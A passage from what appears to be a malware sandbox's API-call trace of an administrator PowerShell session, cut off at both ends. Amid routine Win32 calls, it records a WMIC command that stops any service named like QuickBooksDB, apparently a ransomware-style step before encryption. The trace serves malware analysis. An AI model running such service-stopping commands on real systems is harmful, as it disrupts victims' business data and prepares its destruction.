nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0302.364] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0302.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0302.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0302.365] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0302.365] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0302.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0302.365] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0302.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0302.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0302.365] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0302.365] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0302.366] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0302.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0302.366] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0302.366] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0302.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0302.366] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0302.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0302.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0302.366] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0302.366] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0302.367] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0302.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0302.367] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0302.367] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0302.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0302.367] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0302.367] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0302.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0302.367] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0302.367] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0302.367] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0302.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0302.368] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0302.368] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0302.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0302.368] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0302.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0302.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0302.368] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0302.368] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0302.368] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0302.369] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0302.369] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0302.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0302.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0302.369] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0302.369] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.369] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.369] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0302.369] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0302.370] GetConsoleWindow () returned 0x302b8 [0302.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0302.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0302.374] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0302.374] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0302.375] CoTaskMemFree (pv=0x7e29450) [0302.375] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4c901c4 | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QuickBooksDB%%'\" call stopservice", lpProcessInformation=0x4c901c4*(hProcess=0x8e8, hThread=0x8e4, dwProcessId=0xc48, dwThreadId=0xfac)) returned 1 [0302.396] CloseHandle (hObject=0x8e4) returned 1 [0302.396] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0302.397] GetCurrentProcess () returned 0xffffffff [0302.397] GetCurrentProcess () returned 0xffffffff [0302.397] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x8e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x8e4) returned 1 [0302.397] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x8e4, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0304.449] CloseHandle (hObject=0x8e4) returned 1 [0304.449] GetExitCodeProcess (in: hProcess=0x8e8, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0304.450] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0304.455] CloseHandle (hObject=0x8e8) returned 1 [0304.455] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.455] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa3, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.455] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.455] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa1, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.455] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.456] SetEvent (hEvent=0x8c8) returned 1 [0304.456] SetEvent (hEvent=0x8b8) returned 1 [0304.456] SetEvent (hEvent=0x8c4) returned 1 [0304.456] SetEvent (hEvent=0x8c0) returned 1 [0304.456] SetEvent (hEvent=0x8d8) returned 1 [0304.456] SetEvent (hEvent=0x8cc) returned 1 [0304.456] SetEvent (hEvent=0x8d0) returned 1 [0304.456] SetEvent (hEvent=0x8d4) returned 1 [0304.456] SetEvent (hEvent=0x8e0) returned 1 [0304.456] SetEvent (hEvent=0x8dc) returned 1 [0304.457] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0304.461] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0304.462] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x9c735646, Data2=0x30f, Data3=0x4a9f, Data4=([0]=0x89, [1]=0x7d, [2]=0xdf, [3]=0xe8, [4]=0x1b, [5]=0xd9, [6]=0xdb, [7]=0x35))) returned 0x0 [0304.462] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=39949698966) returned 1 [0304.462] AmsiOpenSession () returned 0x0 [0304.462] AmsiScanString () returned 0x80070015 [0304.470] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=39950487890) returned 1 [0304.470] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa2, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xa9, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0xaa, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0304.471] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ徠玤") returned 0x0 [0304.471] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0304.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0304.472] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0304.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0304.472] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0304.473] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0304.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0304.473] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0304.473] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0304.473] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0304.473] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0304.473] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0304.473] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0304.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0304.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0304.474] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 